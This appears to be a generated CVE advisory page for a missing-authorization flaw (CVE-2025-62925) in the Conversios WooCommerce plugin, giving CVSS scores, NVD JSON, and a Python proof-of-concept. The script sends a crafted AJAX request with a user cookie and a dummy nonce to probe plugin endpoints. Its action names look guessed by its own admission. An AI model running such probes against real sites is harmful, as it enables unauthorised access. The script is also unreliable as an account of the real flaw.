Security Vulnerability Report
中文
CVE-2025-62925 CVSS 5.4 MEDIUM

CVE-2025-62925

Published: 2025-10-27 02:15:52
Last Modified: 2026-04-27 17:16:35

Description

Missing Authorization vulnerability in Conversios Conversios.io enhanced-e-commerce-for-woocommerce-store allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Conversios.io: from n/a through <= 7.2.13.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Conversios.io enhanced-e-commerce-for-woocommerce-store <= 7.2.13 (all versions from n/a)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62925 PoC - Conversios Broken Access Control # Affected: Conversios.io plugin <= 7.2.13 import requests import sys TARGET_URL = input("Enter target URL: ") COOKIE = input("Enter authenticated user cookie: ") # Common Conversios AJAX endpoints that may be vulnerable VULN_ENDPOINTS = [ '/wp-admin/admin-ajax.php', '/wp-json/conversios/v2/', '/wp-json/conversios/v3/' ] # Example vulnerable action (specific action depends on plugin version) PAYLOAD = { 'action': 'conversios_admin_action', 'method': 'get_conversion_data', 'security': 'dummy' # May not be properly validated } def test_vulnerability(): print(f"[*] Testing CVE-2025-62925 on {TARGET_URL}") print(f"[*] Target plugin: Conversios.io enhanced-e-commerce-for-woocommerce-store") print(f"[*] CVSS Score: 5.4 (Medium)") print(f"[*] Vulnerability: Missing Authorization / Broken Access Control") headers = { 'Cookie': COOKIE, 'Content-Type': 'application/x-www-form-urlencoded' } for endpoint in VULN_ENDPOINTS: url = TARGET_URL.rstrip('/') + endpoint try: response = requests.post(url, data=PAYLOAD, headers=headers, timeout=10) if response.status_code == 200 and 'conversios' in response.text.lower(): print(f"[+] Potential vulnerability confirmed at {endpoint}") print(f"[+] Response preview: {response.text[:200]}...") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[-] No obvious vulnerability detected (may require manual testing)") return False if __name__ == '__main__': test_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62925", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:52.220", "lastModified": "2026-04-27T17:16:34.557", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Conversios Conversios.io enhanced-e-commerce-for-woocommerce-store allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Conversios.io: from n/a through <= 7.2.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/enhanced-e-commerce-for-woocommerce-store/vulnerability/wordpress-conversios-io-plugin-7-2-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}